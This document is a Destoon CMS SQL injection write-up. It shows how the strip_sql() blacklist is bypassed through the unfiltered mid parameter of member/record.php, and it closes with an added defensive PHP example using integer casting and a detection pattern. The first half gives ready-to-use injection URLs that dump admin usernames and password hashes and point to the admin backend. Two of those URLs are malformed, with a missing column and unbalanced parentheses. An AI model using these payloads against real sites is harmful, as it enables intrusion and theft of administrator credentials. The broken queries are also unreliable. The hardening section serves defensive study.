In include/global.func.php, the strip_sql() function filters the values passed to it, but this restriction can be bypassed to achieve injection across all versions.
function strip_sql($string) {
    // Each pattern is applied once, in order, to the output of the previous one.
    $search  = array("/union[\s|\t]/i", "/select[\s|\t]/i", "/update[\s|\t]/i", "/outfile[\s|\t]/i", "/ascii/i", "/[\s|\t]or[\s|\t]/i", "/\/\*/i");
    $replace = array('union ', 'select ', 'update ', 'outfile ', 'ascii ', ' or ', '');
    return is_array($string) ? array_map('strip_sql', $string) : preg_replace($search, $replace, $string);
}
In member/record.php:
<?php
require 'config.inc.php';
require '../common.inc.php';
require DT_ROOT.'/module/'.$module.'/record.inc.php';
?>
This pulls in record.inc.php:
switch($action) {
    case 'pay':
        $MODULE[-9]['name'] = $L['resume_name'];
        $MODULE[-9]['islink'] = 0;
        $MODULE[-9]['linkurl'] = $MODULE[9]['linkurl'];
        isset($fromtime) or $fromtime = '';
        isset($totime) or $totime = '';
        isset($dfromtime) or $dfromtime = '';
        isset($dtotime) or $dtotime = '';
        isset($mid) or $mid = 0;
        isset($currency) or $currency = '';
        $module_select = module_select('mid', $L['module_name'], $mid);
        if($keyword) $condition .= " AND title LIKE '%$keyword%'";
        if($fromtime) $condition .= " AND paytime>".(strtotime($fromtime.' 00:00:00'));
        if($totime) $condition .= " AND paytime<".(strtotime($totime.' 23:59:59'));
        if($mid) $condition .= " AND moduleid=$mid";   // $mid is concatenated into the SQL condition without escaping or casting
        if($itemid) $condition .= " AND itemid=$itemid";
        // ...
Here $mid is not filtered, so it is injectable; but there is anti-injection processing in front of it, so let's see how the regular expression can be bypassed. Inject at xxx.com/member/record.php?action=pay&mid=-1+union//***/select//***/1,password,username,5,6,7,8,9 from destoon_member where admin=1-- a and see whether it works. This bypasses the regular expression: strip_sql() removes "/*" in a single pass, so "//***/" becomes the comment "/**/", and since "union" and "select" are never followed by whitespace the keyword patterns never match. The table prefix in the current version must have changed, so I think xxx.com/member/record.php?action=pay&mid=-1+union//***/select//***/,GROUP_CONCAT(DISTINCT+table_name,8,9+from+information_schema.columns+where+table_schema=database()--%20a can be used to get the prefix. Then use xxx.com/member//record.php?action=pay&mid=-1+union//***/select//***/,concat(username,0x3A,password,8,9%20from%20destoon_member%20where%20admin=1--%20a to get the account and password. The ciphertext is of the form md5(md5(psw)), and the backend appears to be admin.php.
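The following is an added example, not Destoon's own code: the page's strip_sql() filter next to the $mid condition as the page shows it and a hardened variant, run over a constructed value that uses the comment-based spacing described above. It assumes $mid is a numeric module id (as its use in moduleid=$mid suggests), so casting it to an integer is the fix; the function names condition_weak and condition_hardened are hypothetical.

```php
<?php
// The blacklist filter as listed on the page. preg_replace() applies each
// pattern once, in order, to the output of the previous one; the result is
// never re-scanned, so a value reshaped by the last pattern is not re-checked.
function strip_sql($string) {
    $search  = array("/union[\s|\t]/i", "/select[\s|\t]/i", "/update[\s|\t]/i",
                     "/outfile[\s|\t]/i", "/ascii/i", "/[\s|\t]or[\s|\t]/i", "/\/\*/i");
    $replace = array('union ', 'select ', 'update ', 'outfile ', 'ascii ', ' or ', '');
    return is_array($string) ? array_map('strip_sql', $string)
                             : preg_replace($search, $replace, $string);
}

// Weak (hypothetical name): mirrors the page's record.inc.php, where the only
// protection for $mid is the blacklist before it is concatenated into SQL.
function condition_weak($mid) {
    $mid = strip_sql($mid);
    return $mid ? " AND moduleid=$mid" : '';
}

// Hardened (hypothetical name): a module id is an integer, so cast it before
// it reaches the query. Anything that is not a positive integer contributes
// no condition at all, whatever text follows the leading digits.
function condition_hardened($mid) {
    $mid = intval($mid);
    return $mid > 0 ? " AND moduleid=$mid" : '';
}

// Constructed sample input (the "+" of the URL already decoded to a space).
// Walking it through strip_sql(): "union/" and "select/" are not followed by
// [\s\t], so the keyword patterns do not fire; the final pattern removes the
// first "/*" of each "//***/", leaving "/**/", which MySQL treats as a comment.
$sample = '-1 union//***/select//***/1,2,3';

echo "weak:     ", condition_weak($sample), "\n";
echo "hardened: ", condition_hardened($sample), "\n";

// Detection hint for the weak path: a parameter that must be numeric but
// contains "/*", "union" or "select" after decoding is worth logging.
function looks_like_injection_attempt($mid) {
    return !ctype_digit((string) $mid)
        && preg_match('/\/\*|union|select/i', (string) $mid) === 1;
}
```

For a request whose mid value is a plain number both functions produce the same condition; the difference only shows once the value carries anything other than digits.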